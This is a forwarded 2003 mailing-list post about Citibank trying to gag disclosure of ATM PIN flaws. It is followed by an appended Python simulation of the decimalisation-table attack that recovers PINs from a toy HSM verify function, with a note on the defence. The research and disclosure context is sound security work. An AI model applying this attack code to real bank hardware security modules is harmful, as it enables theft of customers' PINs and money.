[FYI] R. Anderson: Citibank tries to gag crypto bug disclosure
-> http://cryptome.org/
--- snip ---
To: ukcrypto@chiark.greenend.org.uk
Subject: Citibank tries to gag crypto bug disclosure
Date: Thu, 20 Feb 2003 09:57:34 +0000
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Citibank is trying to get an order in the High Court today gagging public
disclosure of crypto vulnerabilities:
http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf
I have written to the judge opposing the order:
http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf
The background is that my student Mike Bond has discovered some really
horrendous vulnerabilities in the cryptographic equipment commonly used to
protect the PINs used to identify customers to cash machines:
http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
These vulnerabilities mean that bank insiders can almost trivially find out
the PINs of any or all customers. The discoveries happened while Mike and I
were working as expert witnesses on a 'phantom withdrawal' case.
The vulnerabilities are also scientifically interesting:
http://cryptome.org/pacc.htm
For the last couple of years or so there has been a rising tide of
phantoms. I get emails with increasing frequency from people all over the
world whose banks have debited them for ATM withdrawals that they deny
making. Banks in many countries simply claim that their systems are secure
and so the customers must be responsible. It now looks like some of these
vulnerabilities have also been discovered by the bad guys. Our courts and
regulators should make the banks fix their systems, rather than just lying
about security and dumping the costs on the customers.
Curiously enough, Citi was also the bank in the case that set US law on
phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's
an omen, if not a precedent ...
_____
Abstract
We present an attack on hardware security modules used by retail banks for
the secure storage and verification of customer PINs in ATM (cash machine)
infrastructures. By using adaptive decimalisation tables and guesses, the
maximum amount of information is learnt about the true PIN upon each guess.
It takes an average of 15 guesses to determine a four digit PIN using this
technique, instead of the 5000 guesses intended. In a single 30 minute
lunch-break, an attacker can thus discover approximately 7000 PINs rather
than 24 with the brute force method. With a $300 withdrawal limit per card,
the potential bounty is raised from $7200 to $2.1 million and a single
motivated attacker could withdraw $30-50 thousand of this each day. This
attack thus presents a serious threat to bank security.
-- Mike Bond and Piotr Zielinski, Decimalisation table attacks for PIN
cracking, February 2003
--- snap ---
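The abstract above describes the attack only in outline: the caller of the HSM's PIN-verify command chooses the decimalisation table, so by supplying a table that marks a single digit and a trial PIN of 0s and 1s, each query answers "does digit i sit at exactly these positions?" instead of "is the PIN exactly this?". The simulation below is an added example (it is not code from Bond and Zielinski's paper, nor from the original post) that models such a verifier and runs the attack against it. Assumptions: HMAC-SHA256 stands in for the 3DES PIN derivation a real HSM performs, the PIN offset is taken as zero, the trial PIN is passed in clear rather than as an encrypted PIN block, the query-selection rule (pick the query that leaves the fewest candidates on average) is my own greedy realisation of the "adaptive" idea and not necessarily the paper's exact procedure, and the key and account numbers are constructed.

```python
#!/usr/bin/env python3
"""Decimalisation-table attack against a toy IBM 3624-style PIN verifier.

Added example; not code from Bond/Zielinski or from the original post.
"""
import hashlib
import hmac
from itertools import product

# Standard decimalisation table: hex digit x (0..F) -> table[x].
ORIG_TABLE = "0123456789012345"


def decimalise(hex_digits: str, table: str) -> str:
    """Map each hex digit of the cipher block through the table."""
    return "".join(table[int(h, 16)] for h in hex_digits)


class Hsm:
    """Toy PIN-verify command.  A real HSM computes 3DES_K(account) and
    decimalises the leading hex digits; stdlib has no DES, so HMAC-SHA256
    stands in for the block cipher (assumption).  Offsets are ignored and the
    trial PIN is passed in clear rather than as an encrypted PIN block."""

    def __init__(self, pin_derivation_key: bytes):
        self._key = pin_derivation_key
        self.queries = 0

    def _hex_block(self, account: str) -> str:
        return hmac.new(self._key, account.encode(), hashlib.sha256).hexdigest()[:4]

    def natural_pin(self, account: str) -> str:
        """Only used to check the attack result; an attacker never sees this."""
        return decimalise(self._hex_block(account), ORIG_TABLE)

    def verify(self, account: str, trial_pin: str, table: str) -> bool:
        """The attacker-facing API: caller chooses the table, HSM says yes/no."""
        if len(table) != 16 or not table.isdigit():
            raise ValueError("decimalisation table must be 16 decimal digits")
        self.queries += 1
        return decimalise(self._hex_block(account), table) == trial_pin


def indicator_table(digit: int) -> str:
    """D_i: 1 wherever the standard table yields `digit`, 0 elsewhere, so
    decimalising with it marks exactly the positions of `digit` in the PIN."""
    return "".join("1" if ORIG_TABLE[x] == str(digit) else "0" for x in range(16))


def position_mask(pin: str, digit: int) -> int:
    """Bit k set iff pin[k] == digit (bit 0 = leftmost PIN digit)."""
    return sum(1 << k for k, d in enumerate(pin) if d == str(digit))


ALL_PINS = ["".join(p) for p in product("0123456789", repeat=4)]
MASKS = {pin: [position_mask(pin, i) for i in range(10)] for pin in ALL_PINS}


def recover_pin(oracle) -> str:
    """Adaptive attack.  oracle(trial_pin, table) -> bool is the verify call
    with the account fixed.  Every query is (digit i, 4-bit pattern m): table
    D_i with a trial PIN holding 1s at the positions in m answers "yes" iff the
    true PIN has digit i at exactly those positions (m == 0 means "i absent").
    Each step picks the query that leaves the fewest candidates on average."""
    candidates = list(ALL_PINS)
    while len(candidates) > 1:
        n = len(candidates)
        best = None
        for i in range(10):
            hist = [0] * 16
            for pin in candidates:
                hist[MASKS[pin][i]] += 1
            for m, yes in enumerate(hist):
                if 0 < yes < n:
                    expected = (yes * yes + (n - yes) * (n - yes)) / n
                    if best is None or expected < best[0]:
                        best = (expected, i, m)
        _, i, m = best
        trial = "".join("1" if (m >> k) & 1 else "0" for k in range(4))
        answer = oracle(trial, indicator_table(i))
        candidates = [pin for pin in candidates if (MASKS[pin][i] == m) == answer]
    return candidates[0]


def brute_force_pin(oracle) -> tuple:
    """Baseline the abstract compares against: standard table, guess 0000..9999."""
    for guesses, pin in enumerate(ALL_PINS, start=1):
        if oracle(pin, ORIG_TABLE):
            return pin, guesses
    raise RuntimeError("no PIN matched")


if __name__ == "__main__":
    hsm = Hsm(b"constructed-pin-derivation-key")   # constructed, not a real key
    account = "4000123456789010"                    # constructed account number
    oracle = lambda trial, table: hsm.verify(account, trial, table)
    found = recover_pin(oracle)
    print(f"recovered {found} (true {hsm.natural_pin(account)}) in {hsm.queries} queries")
    hsm.queries = 0
    print("brute force would need", brute_force_pin(oracle)[1], "queries")
```

The defence the paper's setting lacks is visible in `verify`: the HSM accepts any 16-digit table from the caller, so the table is attacker-controlled input to a secret-dependent comparison. Binding the table to the key (or to the account range) inside the HSM, rather than taking it per call, removes the oracle; the model here deliberately keeps the weak interface so the attack runs.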
--
To unsubscribe, e-mail: debate-unsubscribe@lists.fitug.de
For additional commands, e-mail: debate-help@lists.fitug.de